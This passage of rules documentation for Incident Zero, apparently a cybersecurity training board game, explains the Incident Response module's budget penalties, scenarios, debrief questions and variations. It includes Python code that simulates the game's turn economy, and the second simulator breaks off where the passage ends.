How the Uncontained Threats Penalty Works

Step 1: Threat Revealed
  - When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment)
  - Add 1 to the Uncontained Threats Tracker
  - This threat is now "active" and dangerous

Step 2: Penalty Applied at Turn Start
  - At the START of every turn, deduct 5 Budget per uncontained threat
  - Example: 2 uncontained threats = 10 Budget penalty each turn
  - This creates continuous pressure—you MUST contain threats or lose resources

Step 3: Auto-Mitigation
  - When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents shift of attention to new priority)
  - Uncontained Threats Tracker decreases by 1
  - Penalties decrease immediately

Step 4: Emergency Response Containment
  - Team can use Emergency Response action to immediately remove a threat from the board
  - Cost: 15 Budget (v2.2)
  - Uncontained Threats Tracker decreases by 1

Active Breach Cost (v2.2)

Example Walkthrough (v2.2 — recomputed)

SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]

Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
        INVESTIGATE email headers (-5, 90). Roll succeeds.
        → 1st success vs. link 1: clue about the phishing campaign.

Turn 2: START → Active Breach Cost -5 (85).
        INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
        → 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
        Uncontained Threats = 1. Reward: Budget Grant +10 (90).

Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
        INVESTIGATE network logs (-5, 75). Roll succeeds.
        → 1st success vs. link 2: clue about SMB lateral movement.

Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
        DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
        FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
        → ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
        Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
        Reward: Budget Grant +10 (60).

Turn 5: START → -10 (50).
        INVESTIGATE database access logs (-5, 45). Roll fails. No progress.

Turn 6: START → -10 (35).
        INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
        → 1st success vs. link 3: clue about bulk data leaving the database.

Turn 7: START → -10 (20).
        DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
        FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
        → ✓ DATABASE EXFILTRATION REVEALED — final card!
        Victory is checked IMMEDIATELY (before any start-of-turn penalties).

WIN on the final turn with 5 Budget remaining.

(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)
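The turn loop, the start-of-turn costs and the reveal rules can be checked mechanically rather than by hand. The following is an added example written for this guide, not part of the Incident Zero materials: a small Python simulator that encodes the v2.2 economy (Active Breach Cost, Uncontained Threats Penalty, two-success Investigate reveals, full-match Deploy reveals, auto-mitigation, Emergency Response, Budget floor at 0, turn limit (chain × 2) + 1, victory checked immediately on the final reveal) and replays the walkthrough above with its roll outcomes scripted. Dice are replaced by pre-decided success flags; the card names and the Budget Grant taken at each reveal come from the walkthrough, and the simulator assumes no Discovery Reward is applied after the final reveal, which is how the walkthrough's arithmetic ends at 5 Budget.

```python
"""Turn-economy simulator for the Incident Response Module (v2.2 rules).

Added example, not part of the Incident Zero materials. Dice are replaced
by scripted success flags so a replay is deterministic; at the table you
roll 1d20 and need roll + modifiers >= 11.
"""
from dataclasses import dataclass, field
from typing import List, Optional

ACTIVE_BREACH_COST = 5    # per turn while any chain card is still hidden (v2.2)
UNCONTAINED_PENALTY = 5   # per revealed-but-uncontained threat, each turn start
INVESTIGATE_COST = 5
DEPLOY_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
EMERGENCY_COST = 15       # v2.2 price
BUDGET_GRANT = 10         # Discovery Reward option 2 (v2.2 value)


@dataclass
class Game:
    chain: List[str]              # hidden attack chain, earliest link first
    budget: int = 100
    turn: int = 1
    revealed: int = 0             # face-up links; only chain[revealed] can be targeted
    successes: int = 0            # Investigate successes accumulated on the current link
    uncontained: int = 0
    outcome: Optional[str] = None
    log: List[str] = field(default_factory=list)

    @property
    def turn_limit(self) -> int:
        return len(self.chain) * 2 + 1      # Variable Game Length formula, Core Rules 3a

    def _spend(self, cost: int) -> None:
        if self.budget < cost:              # actions require the full cost (v2.2 edge rule)
            raise ValueError(f"cannot afford {cost} with {self.budget} Budget")
        self.budget -= cost

    def start_of_turn(self) -> None:
        if self.turn > self.turn_limit:     # turns expired with cards still hidden
            self.outcome = "LOSS (turn limit)"
            return
        penalty = self.uncontained * UNCONTAINED_PENALTY
        if self.revealed < len(self.chain):
            penalty += ACTIVE_BREACH_COST
        self.budget = max(0, self.budget - penalty)   # Budget floors at 0
        self.log.append(f"Turn {self.turn} start: -{penalty} -> {self.budget}")

    def _reveal(self, how: str) -> None:
        card = self.chain[self.revealed]
        self.revealed += 1
        self.successes = 0
        # Auto-mitigation: the previously uncontained link is contained when the
        # next one is revealed, so exactly one threat is uncontained afterwards.
        self.uncontained = 1
        if self.revealed == len(self.chain):
            self.outcome = "WIN"            # checked immediately; no reward applied (assumption)
        else:
            self.budget += BUDGET_GRANT     # the walkthrough always takes Budget Grant
        self.log.append(f"Turn {self.turn}: {card} revealed by {how} -> {self.budget}")

    def investigate(self, success: bool) -> None:
        self._spend(INVESTIGATE_COST)
        if success:
            self.successes += 1             # 1st success: clue; 2nd on same link: reveal
            if self.successes == 2:
                self._reveal("investigation")

    def deploy(self, tier: str, success: bool, full_match: bool) -> None:
        self._spend(DEPLOY_COST[tier])
        if success and full_match:          # vector AND chain step both match
            self._reveal("deploy")

    def emergency_response(self) -> None:
        if self.uncontained == 0:
            raise ValueError("needs a revealed, uncontained threat")
        self._spend(EMERGENCY_COST)         # no roll; always succeeds
        self.uncontained -= 1

    def end_of_turn(self) -> None:
        self.turn += 1                      # drawing a Defense Card is not modelled


def victory_points(g: Game, starting_budget: int = 100) -> float:
    """Optional Victory Scoring formula from Winning & Losing."""
    return g.revealed * 50 / len(g.chain) + g.budget * 50 / starting_budget


def replay_walkthrough() -> Game:
    """Replay the 3-card walkthrough with its roll outcomes scripted."""
    g = Game(chain=["Phishing Campaign", "Lateral Movement via SMB",
                    "SQL Database Exfiltration"])
    script = [
        ("investigate", {"success": True}),                                     # T1 clue
        ("investigate", {"success": True}),                                     # T2 reveal, +10
        ("investigate", {"success": True}),                                     # T3 clue
        ("deploy", {"tier": "ADVANCED", "success": True, "full_match": True}),  # T4 reveal, +10
        ("investigate", {"success": False}),                                    # T5 no progress
        ("investigate", {"success": True}),                                     # T6 clue
        ("deploy", {"tier": "ADVANCED", "success": True, "full_match": True}),  # T7 final card
    ]
    for action, kwargs in script:
        g.start_of_turn()
        if g.outcome:
            break
        getattr(g, action)(**kwargs)
        if g.outcome:
            break
        g.end_of_turn()
    return g


if __name__ == "__main__":
    game = replay_walkthrough()
    print("\n".join(game.log))
    print(game.outcome, "on turn", game.turn, "with", game.budget, "Budget;",
          victory_points(game), "Victory Points")
```

Run it directly to print the turn log; the final state (WIN on turn 7 with 5 Budget, 52.5 points under the optional Victory Scoring formula) matches the arithmetic check. Threat Orchestrators can script other sequences, or change the constants to test a variation such as Speed Mode, before putting a scenario in front of a table.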


Winning & Losing

Victory Condition ✓

Blue Team wins Incident Response if:
  1. ALL threat cards in the attack chain are revealed (face-up on table), AND
  2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.

Defeat Condition ✗

Blue Team loses Incident Response if:
  1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR
  2. The team cannot take any legal action (see Budget Edge Rules below)

Losing Scenarios:
  - Turns expired with only 2 of 4 cards revealed = attack succeeded
  - Budget too low to afford any action = response ran out of resources

Budget Edge Rules (v2.2)

Victory Scoring (Optional)

If you want to measure quality of victory:

Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50

Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0/100 × 50) = 25 + 0 = 25/100 (Defeat)

Discovery Rewards

When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:

Reward Option 1: Intelligence Bonus 📚

Reward Option 2: Budget Grant 💰

Reward Option 3: Fast-Track Investigation 🚀

Important: Choose only ONE reward per card reveal. Cannot combine rewards.


Debrief & Reflection (5-10 minutes)

Every game should conclude with guided reflection connecting game mechanics to real security concepts.

For Winners (Questions about Success)

  1. "What was your investigation strategy? What worked best?"
     - Explore which investigation themes were most successful
     - Discuss whether they targeted the right logs/evidence first
  2. "Which action type was most effective for you—Investigate or Deploy Defense?"
     - Some teams succeed with heavy investigation, others with defense-focused discovery
     - Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)
  3. "How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"
     - Did they force you to make reactive decisions?
     - Were they realistic representations of incident response and dwell-time costs?
  4. "If you replayed, what would you do differently?"
     - Reflection on optimization and efficiency
     - Planning better strategies for next playthrough

For Losers (Questions about Learning)

  1. "What went wrong in your investigation? Where did you get stuck?"
     - Identify which threat was hardest to detect and why
     - Discuss investigation approaches that didn't work
  2. "Would you have benefited from more defense deployments vs. investigations?"
     - Analyze if budget allocation strategy was optimal
     - Discuss risk/reward trade-offs
  3. "How would you investigate differently if you could replay?"
     - Recovery and learning from failure
     - Strategic adjustments for next attempt
  4. "What was the attacker's complete kill chain?"
     - TO reveals the full hidden attack chain (all cards, clues, explanations)
     - Discussion of what signals should have tipped them off

For Everyone (Real-World Connection)

  1. "What was the attacker's complete kill chain? Which step was most critical?"
     - Understand the full attack story
     - Discuss which card took longest to detect and why
  2. "Why isn't this easy to detect in real-world networks?"
     - Real attacks hide in massive volumes of legitimate traffic
     - Attackers use living-off-the-land techniques
     - Detection requires specific telemetry (EDR, SIEM, network monitoring)
  3. "What tool or process would have helped you detect faster?"
     - Threat hunting
     - Behavioral analytics
     - Specific log sources (PowerShell logs, Sysmon, Zeek)
     - User and Entity Behavior Analytics (UEBA)
  4. "How does game dwell time compare to real breaches?"
     - Average dwell time in real breaches: 200+ days
     - Game represents 2-8 hours of focused investigation
     - The Active Breach Cost models why every day of dwell time hurts

Tips for Threat Orchestrators

Before the Game (Preparation)

  1. Read the module rules completely - Understand Investigate, Deploy Defense, and Emergency Response mechanics
  2. Prepare your attack chain - Pre-build or write down your 3-5 hidden cards in sequence
  3. Write clear clues - For each card, write 2-3 progressive clues that reveal information gradually (v2.2: expect up to two clue deliveries per card before an investigation reveal)
  4. Organize materials - Sort Defense Cards by tier, prepare trackers, have dice ready
  5. Practice reading clues dramatically - Deliver them with narrative flair to create engagement

Crafting Effective Clues

Poor clue (too vague, gives nothing away):
  - "You find something suspicious"
  - "There's a threat somewhere"

Bad clue (gives it away completely):
  - "The attacker used Mimikatz to dump credentials from LSASS memory"
  - "You have a database exfiltration happening right now"

Good clue (progressive disclosure, dramatic delivery):
  - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Excellent clue (specific without revealing, creates narrative):
  - "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."

Balancing Difficulty During Play

The game is TOO EASY if:
  - Team reveals all cards in the first half of the turn limit with 60+ Budget remaining
  - Multiple consecutive successful rolls (unlikely with d20)
  - Clues are too specific/obvious
  - Team makes no difficult decisions

Action: Make clues more subtle, reduce starting budget next time, or add an extra card to the chain

The game is TOO HARD if:
  - Team gets stuck after revealing only 1 card (4+ turns with no progress)
  - Multiple consecutive failed rolls
  - Team is frustrated rather than challenged
  - Team is out of ideas about what to investigate

Action: Provide more explicit clues, increase starting budget, reduce chain length

Adjustment Options:
  - Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1
  - Clue Quality: More specific/obvious (easier) vs. subtle (harder)
  - Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier)
  - Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)

Running Competitive Games (Multiple Teams)

If running for tournament or competitive context:

  1. Assign different attack chains to each team (or same chain for scoring comparison)
  2. Teams cannot see each other's progress (prevents copying strategies)
  3. Scoring: First team to reveal all cards wins; tiebreaker is most Budget remaining
  4. Set clear turn/budget limits before game starts
  5. Track publicly so teams know they're racing against time/budget

Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 minutes)

Attack Chain:
  1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
  2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE)
  3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

Starting Budget: 100 Turn Limit: 7 [(3 × 2) + 1]

Narrative Setup:

"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."

Focus: Teaching full kill chain detection (initial → credential harvesting → data theft)
Expected Duration: 30 minutes
Best For: First-time players, classroom introduction

Sample Defenses in Starting Hand:
  - D-01: Email Authentication Setup (BASIC, 10)
  - D-02: User Security Training (BASIC, 10)
  - D-07: Multi-Factor Authentication (ADVANCED, 15)
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-11: Data Loss Prevention (ADVANCED, 15)


Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 minutes)

Attack Chain:
  1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE)
  4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)

Starting Budget: 100 Turn Limit: 9 [(4 × 2) + 1]

Narrative Setup:

"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."

Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts
Expected Duration: 40 minutes
Best For: Experienced players, demonstrating complex kill chain

Sample Defenses:
  - D-18: Intrusion Prevention System (IPS) (ADVANCED, 15)
  - D-09: Network Segmentation (ADVANCED, 15)
  - D-04: Network Firewall Rules (BASIC, 10)
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-13: Threat Hunting Program (ELITE, 25)
  - D-14: Memory Forensics (ELITE, 25)


Scenario 3: "Advanced Ransomware Supply Chain" (Advanced, 5 cards, 45 minutes)

Attack Chain:
  1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE)
  2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
  3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE)
  4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)
  5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)

Starting Budget: 100 Turn Limit: 11 [(5 × 2) + 1]

Narrative Setup:

"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"

Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure
Expected Duration: 45 minutes
Best For: Advanced players, demonstrating supply chain risk

Sample Defenses:
  - D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment
  - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
  - D-09: Network Segmentation (ADVANCED, 15)
  - D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit
  - D-14: Memory Forensics (ELITE, 25)
  - D-19: Backup & Disaster Recovery (BASIC, 10)
  - D-11: Data Loss Prevention (ADVANCED, 15)


Extensions & Variations

Variation 1: Solo Play Mode

How to Play Solo:
  - Single player acts as both Blue Team AND Threat Orchestrator
  - Orchestrator creates attack chain before game starts
  - Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards)
  - Requires discipline: don't use knowledge of chain to guide rolls

Best For: Individual learning, skill practice


Variation 2: Speed Mode

Compress the Game:
  - Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7)
  - Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping)
  - Budget costs stay the same
  - Budget starts at 120 to balance speed pressure

Best For: Experienced teams wanting high-stakes challenge


Variation 3: Extended Investigation (Advanced)

Deeper Forensics:
  - Add "Advanced Investigate" action (costs 15 Budget, rolls 11+)
  - A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2)
  - Allows for riskier but more rewarding investigation strategy

Best For: Players who want forensic investigation to feel more rewarding


Variation 4: Competitive Tournament

Multiple Teams, Same Challenge:
  1. All teams receive the same 4-card attack chain
  2. All teams start with same 100 Budget, same 5 Defense Cards drawn
  3. Teams play simultaneously (or in sequence) against same scenario
  4. Scoring: Cards revealed + Budget remaining = final score
  5. Tiebreaker: Fewest turns taken

Best For: Classroom competition, conference play, benchmarking


Next Steps After This Module

If You Won (Completed All Cards)

Option 1: Continue to Hardening Module
  - Excellent choice if building defenses against discovered threats
  - Use the attack chain you just discovered as the hardening context
  - Natural progression: detect the attack → now prevent it

Option 2: Continue to Audit & Compliance Module
  - Great for understanding how to detect this attack chain
  - Validates that your detection methods work
  - Audits your existing security controls

If You Lost (Time/Budget Expired)

Option 1: Continue to Disaster Recovery Module
  - Appropriate: assume the attack succeeded
  - Manage the breach that just happened
  - Focus on response, stakeholder communication, recovery

Option 2: Replay with Different Strategy
  - Try again with different investigation/defense approach
  - Use what you learned to optimize for next attempt

Option 3: Study Real Breach Case Studies
  - Compare your experience to real breaches (Equifax, Target, SolarWinds)
  - Understand why real dwell times are 200+ days
  - Learn what signals real defenders look for

Standalone Play

Play Again with:
  - Different attack chain from the card deck
  - Different difficulty (if you won easily or struggled)
  - Competitive mode against other teams
  - Extended variations with different mechanics


Quick Reference: Actions & Costs

| Action | Cost | Roll Required | Success Condition | Failure Condition |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: card revealed (v2.2) | No intel gained |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 Budget (v2.2) | None | Threat removed, penalty stops | None (always succeeds) |

Quick Reference: Modifiers

| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence" |
| +1 | Real security tools/techniques | "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link |
| +0 | Vague/no justification | "Find suspicious activity" |

Quick Reference: Trackers

| Tracker | Starts At | Changes |
|---|---|---|
| Budget | 100 | -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when card revealed, -1 when auto-mitigated or Emergency Response used |

v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Investigation reveals (accumulating successes). The first successful Investigation of a chain link yields a clue; a second successful Investigation of that same link reveals the card. Deploy Defense full-match still reveals immediately. Previously only defense deployment could reveal cards, contradicting the overview text. Validate: does investigation-led play feel viable but slower than defense-led play?
  2. Deployed Defense Persistence. A deployed defense grants +2 to Investigate/Deploy rolls against any chain link matching its vector. Partial/no-match deployments now have lasting value.
  3. Active Breach Cost. −5 Budget at the start of each turn while at least one chain card is unrevealed. Fixes the inversion where hidden threats were free; teaches that dwell time costs money.
  4. Economy rebalance: Budget Grant reward reduced +15 → +10; Emergency Response repriced 25 → 15 Budget.
  5. Budget edge rules: Budget floors at 0; actions require full cost; victory is checked immediately on the final reveal (before start-of-turn penalties); defeat at 0 only if no legal action exists.
  6. Turn limits use the Variable Game Length formula (chain × 2) + 1 → 7/9/11 turns, replacing the fixed 12/10/10 table (see Core Rules §3a).
  7. Sequential discovery clarified: only the earliest unrevealed chain card can be revealed.
  8. Content fixes: sample-defense lists now cite real card IDs from the canonical 24-card deck (D-01–D-24); D-11 DLP correctly listed as ADVANCED/15.

Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.


Need Help?


Incident Response Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/incident-response.md

Incident Response Module: Standalone Play Guide

Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Incident response training, attack detection practice, SOC operations


Module Overview

The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.

This is the foundation module—many other modules build upon successful or unsuccessful incident response.


Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

| Difficulty | Chain Length | Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |

2. Threat Orchestrator Preparation

Create the Attack Chain:
  1. Select 3-5 threat cards in logical sequence
  2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL
  3. Write down clues for each hidden card (don't reveal yet)
  4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md

Recommended first-time scenario:
- T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
- T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
- T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
- Total: 3 cards, ~30 minutes, teaches full attack chain concept

3. Blue Team Setup

4. Read the Opening Scenario

The Threat Orchestrator reads an opening scenario based only on the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."


Gameplay Loop (25-35 minutes)

Round Structure

Each turn follows this structure:

1. START OF TURN
   - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget
   - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free)
   - Read turn number aloud ("Turn 3...")

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Team discusses strategy
   - Decides on ONE action (see below)
   - Announces action and parameters

3. ACTION RESOLUTION
   - Roll 1d20 for success/failure
   - Apply modifiers (see below)
   - Determine outcome

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 Defense Card
   - Check if game won/lost

Three Available Actions

Action 1: Investigate 🔎

Cost: 5 Budget
Roll Required: 11+ (on d20)

How it works:
  1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs")
  2. Provide technical justification for the investigation approach
  3. Roll 1d20

Roll Modifiers:
- +2 bonus: Strong technical justification (references specific logs, tools, or methodologies)
- +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK)
- No modifier (+0): Vague investigation

Examples of good justification:
- "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds"
- "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"

Outcomes (v2.2 — investigation successes accumulate):
- Success (roll + modifiers ≥ 11):
  - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below)
  - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward
- Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.

Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on card tier)
Roll Required: 11+ (on d20)

How it works:
  1. Choose a Defense Card from your hand
  2. Target a specific Asset or threat vector
  3. Explain why this defense is appropriate for the situation
  4. Roll 1d20

Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)

Outcomes:
- Success (roll + modifiers ≥ 11):
  - If the card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY!
  - If it matches but wrong step, or right step but wrong vector → Defense deployed but no reveal
  - If neither matches → Defense deployed but ineffective against current threat

Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.


Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25)
Roll Required: None—this always succeeds

How it works:
  1. Choose a previously revealed Threat Card still in play
  2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.)
  3. Card is immediately removed from play
  4. Uncontained Threats penalty decreases by 1

Strategic Use:
- Use this if you're running out of budget and accumulating penalties
- Use this if a threat is too dangerous to leave active
- Use this to prepare for later modules (e.g., if continuing to Hardening, fewer contained threats = more budget available)


Uncontained Threats Penalty & Active Breach Cost

How it works:
  1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker)
  2. At the START of each turn, deduct 5 Budget per uncontained threat
  3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too)
  4. When Emergency Response is used, remove that threat and decrement the tracker
  5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)

Example (one action per turn; 3-card chain; Budget 100):

Turn 1: START → -5 Active Breach Cost (95)
        Deploy Defense succeeds, full match → PHISHING REVEALED
        (-10 for the BASIC defense, 85) → Uncontained Threats = 1
        Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
        Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
        ...investigation continues toward the next chain card

Winning & Losing

Victory Condition ✓

Blue Team Wins if:
- All threat cards in the attack chain are revealed
- AND this happens within your turn limit (7/9/11 by chain length)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.

Defeat Condition ✗

Blue Team Loses if:
- Turn Tracker exceeds your turn limit with unrevealed cards remaining
- OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)

Scoring (Optional)

If you want to score:

Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50

Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)

Discovery Rewards

When your team successfully reveals a Threat Card:

Choose ONE reward:

  1. Intelligence Bonus: Draw 2 additional Defense Cards (keep both)
  2. Budget Grant: Gain +10 Budget (v2.2 — reduced from +15; represents management approval of your response)
  3. Fast-Track: On your next Investigate action, you succeed on 5+ instead of 11+ (still costs 5 Budget, still need justification modifiers)
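The turn loop, action costs, start-of-turn penalties, rewards, win/loss checks and scoring formula above fit in a small rules engine, which is useful for checking a balance change before a session. The following is an added worked example, not code from Incident Zero or RetroVerse Studios. It encodes the v2.2 standalone rules so that the budget walkthrough in the penalty section can be replayed and other lines of play tried. Dice results are passed in rather than rolled, so a run is deterministic; Investigate and Deploy modifiers are passed as one number (+2 justification, +1 real tool) and the Deployed Defense Persistence +2 is applied automatically. Only the Budget Grant reward changes the numbers tracked here (Intelligence Bonus changes the hand and Fast-Track the next roll, so both are left out), and the Uncontained Threats Tracker is kept as 0 or 1 because revealing the next card mitigates the previous threat. The names IRGame and replay_worked_example, and the label "EXPERT" for the 25-Budget tier (the page gives the cost but not the name), are this example's own.

```python
"""Turn economy of the Incident Response standalone game (v2.2 rules above).

Added worked example, not the project's code: start-of-turn deductions, action
costs and rolls, sequential discovery, the Budget Grant reward, win/loss checks
and optional scoring, so the walkthrough above can be replayed. Dice results are
passed in; IRGame and the "EXPERT" tier label are this example's own names.
"""
from dataclasses import dataclass, field

TIER_COST = {"BASIC": 10, "ADVANCED": 15, "EXPERT": 25}  # Deploy a Defense, by tier
INVESTIGATE_COST, EMERGENCY_COST, TARGET = 5, 15, 11      # success: roll + mods >= 11


@dataclass
class IRGame:
    chain: list                 # (card_id, step, vector) tuples in kill-chain order
    budget: int = 100
    turn: int = 0               # Turn Tracker; start_of_turn() advances it to 1, 2, ...
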